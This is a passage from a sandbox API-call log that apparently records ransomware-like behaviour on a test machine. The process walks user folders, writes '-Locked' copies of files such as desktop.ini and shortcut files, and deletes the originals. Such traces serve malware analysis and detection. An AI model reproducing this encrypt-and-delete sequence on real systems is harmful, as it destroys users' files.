dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.597] GetFileType (hFile=0x49c) returned 0x1 [0302.597] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0302.597] GetFileType (hFile=0x49c) returned 0x1 [0302.599] CloseHandle (hObject=0x49c) returned 1 [0302.599] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\desktop.ini", lpFilePart=0x0) returned 0x31 [0302.599] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\links\\desktop.ini")) returned 1 [0302.600] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links", nBufferLength=0x105, lpBuffer=0x1aeca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links", lpFilePart=0x0) returned 0x25 [0302.600] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0f4) returned 1 [0302.600] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\links"), fInfoLevelId=0x0, lpFileInformation=0x1af174 | out: lpFileInformation=0x1af174*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34c2a132, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34c2a132, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0302.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0f0) returned 1 [0302.600] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\links")) returned 0 [0302.602] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links", lpFilePart=0x0) returned 0x1b [0302.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0302.602] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links", lpFilePart=0x0) returned 0x1b [0302.603] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links\\", lpFilePart=0x0) returned 0x1c [0302.603] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0302.603] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0302.604] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x43754b80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0302.604] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437c7194, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437c7194, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x207, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0302.604] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437c7194, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437c7194, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x3d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0302.604] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0302.604] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0302.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0302.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0302.604] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0302.605] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links", lpFilePart=0x0) returned 0x1b [0302.605] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links\\", lpFilePart=0x0) returned 0x1c [0302.605] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0302.605] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0302.606] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x43754b80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0302.606] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437c7194, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437c7194, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x207, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0302.606] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437c7194, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437c7194, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x3d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0302.607] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437c7194, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437c7194, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x3d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 0 [0302.607] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0302.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0302.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0302.607] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links\\desktop.ini-Locked", lpFilePart=0x0) returned 0x2e [0302.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.607] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.608] GetFileType (hFile=0x49c) returned 0x1 [0302.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.608] GetFileType (hFile=0x49c) returned 0x1 [0302.610] CloseHandle (hObject=0x49c) returned 1 [0302.610] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links\\desktop.ini", lpFilePart=0x0) returned 0x27 [0302.610] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\desktop.ini")) returned 1 [0302.611] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\Desktop.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links\\Desktop.lnk-Locked", lpFilePart=0x0) returned 0x2e [0302.611] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.611] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\Desktop.lnk-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\desktop.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.614] GetFileType (hFile=0x49c) returned 0x1 [0302.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.614] GetFileType (hFile=0x49c) returned 0x1 [0302.647] CloseHandle (hObject=0x49c) returned 1 [0302.648] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\Desktop.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links\\Desktop.lnk", lpFilePart=0x0) returned 0x27 [0302.648] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\Desktop.lnk" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\desktop.lnk")) returned 1 [0302.652] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\Downloads.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links\\Downloads.lnk-Locked", lpFilePart=0x0) returned 0x30 [0302.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.653] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\Downloads.lnk-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\downloads.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.653] GetFileType (hFile=0x49c) returned 0x1 [0302.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.653] GetFileType (hFile=0x49c) returned 0x1 [0302.655] CloseHandle (hObject=0x49c) returned 1 [0302.655] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\Downloads.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links\\Downloads.lnk", lpFilePart=0x0) returned 0x29 [0302.655] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\Downloads.lnk" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\downloads.lnk")) returned 1 [0302.656] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Local Settings", lpFilePart=0x0) returned 0x24 [0302.656] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0302.656] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Local Settings", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Local Settings", lpFilePart=0x0) returned 0x24 [0302.656] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\", lpFilePart=0x0) returned 0x25 [0302.656] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0302.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af128) returned 1 [0302.658] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music", lpFilePart=0x0) returned 0x1b [0302.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0302.658] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music", lpFilePart=0x0) returned 0x1b [0302.658] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\", lpFilePart=0x0) returned 0x1c [0302.658] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb45c2764, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb45c2764, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0302.659] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb45c2764, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb45c2764, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0302.659] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43649a85, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43649a85, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0302.659] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a006340, ftCreationTime.dwHighDateTime=0x1d7d8f3, ftLastAccessTime.dwLowDateTime=0x8dc735d0, ftLastAccessTime.dwHighDateTime=0x1d7dc7b, ftLastWriteTime.dwLowDateTime=0x8dc735d0, ftLastWriteTime.dwHighDateTime=0x1d7dc7b, nFileSizeHigh=0x0, nFileSizeLow=0x127eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="FliceLJAYp8j0i3clDA.m4a", cAlternateFileName="FLICEL~1.M4A")) returned 1 [0302.660] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x465b8f30, ftCreationTime.dwHighDateTime=0x1d7e3aa, ftLastAccessTime.dwLowDateTime=0xf36fb50, ftLastAccessTime.dwHighDateTime=0x1d7e3bb, ftLastWriteTime.dwLowDateTime=0xf36fb50, ftLastWriteTime.dwHighDateTime=0x1d7e3bb, nFileSizeHigh=0x0, nFileSizeLow=0x48c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hc-ff1Mym_xG 8y7.wav", cAlternateFileName="HC-FF1~1.WAV")) returned 1 [0302.660] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52b9900, ftCreationTime.dwHighDateTime=0x1d7dcdf, ftLastAccessTime.dwLowDateTime=0xda6309b0, ftLastAccessTime.dwHighDateTime=0x1d7e053, ftLastWriteTime.dwLowDateTime=0xda6309b0, ftLastWriteTime.dwHighDateTime=0x1d7e053, nFileSizeHigh=0x0, nFileSizeLow=0x6c9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PZBiyuFJk P66leN.wav", cAlternateFileName="PZBIYU~1.WAV")) returned 1 [0302.660] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xccab0970, ftCreationTime.dwHighDateTime=0x1d7d8cf, ftLastAccessTime.dwLowDateTime=0x32972b60, ftLastAccessTime.dwHighDateTime=0x1d7df29, ftLastWriteTime.dwLowDateTime=0x32972b60, ftLastWriteTime.dwHighDateTime=0x1d7df29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Suzai", cAlternateFileName="")) returned 1 [0302.660] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7857aab0, ftCreationTime.dwHighDateTime=0x1d7e6fb, ftLastAccessTime.dwLowDateTime=0x3612bfb0, ftLastAccessTime.dwHighDateTime=0x1d7e74f, ftLastWriteTime.dwLowDateTime=0x3612bfb0, ftLastWriteTime.dwHighDateTime=0x1d7e74f, nFileSizeHigh=0x0, nFileSizeLow=0xaac, dwReserved0=0x0, dwReserved1=0x0, cFileName="YchaUe.m4a", cAlternateFileName="")) returned 1 [0302.660] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9fa9a20, ftCreationTime.dwHighDateTime=0x1d7de4d, ftLastAccessTime.dwLowDateTime=0xf718f1e0, ftLastAccessTime.dwHighDateTime=0x1d7e38d, ftLastWriteTime.dwLowDateTime=0xf718f1e0, ftLastWriteTime.dwHighDateTime=0x1d7e38d, nFileSizeHigh=0x0, nFileSizeLow=0x1713b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yhytw0.m4a", cAlternateFileName="")) returned 1 [0302.660] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ce2280, ftCreationTime.dwHighDateTime=0x1d7e563, ftLastAccessTime.dwLowDateTime=0x947a5dc0, ftLastAccessTime.dwHighDateTime=0x1d7e77b, ftLastWriteTime.dwLowDateTime=0x947a5dc0, ftLastWriteTime.dwHighDateTime=0x1d7e77b, nFileSizeHigh=0x0, nFileSizeLow=0xaa41, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZD9ZxqvIbPOBH.mp3", cAlternateFileName="ZD9ZXQ~1.MP3")) returned 1 [0302.661] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0302.661] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0302.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0302.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0302.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0302.661] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music", lpFilePart=0x0) returned 0x1b [0302.661] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\", lpFilePart=0x0) returned 0x1c [0302.661] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb45c2764, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb45c2764, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0302.662] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb45c2764, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb45c2764, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0302.662] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43649a85, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43649a85, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0302.662] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a006340, ftCreationTime.dwHighDateTime=0x1d7d8f3, ftLastAccessTime.dwLowDateTime=0x8dc735d0, ftLastAccessTime.dwHighDateTime=0x1d7dc7b, ftLastWriteTime.dwLowDateTime=0x8dc735d0, ftLastWriteTime.dwHighDateTime=0x1d7dc7b, nFileSizeHigh=0x0, nFileSizeLow=0x127eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="FliceLJAYp8j0i3clDA.m4a", cAlternateFileName="FLICEL~1.M4A")) returned 1 [0302.662] FindNextFileW (in: hFindFile=0x737a28, 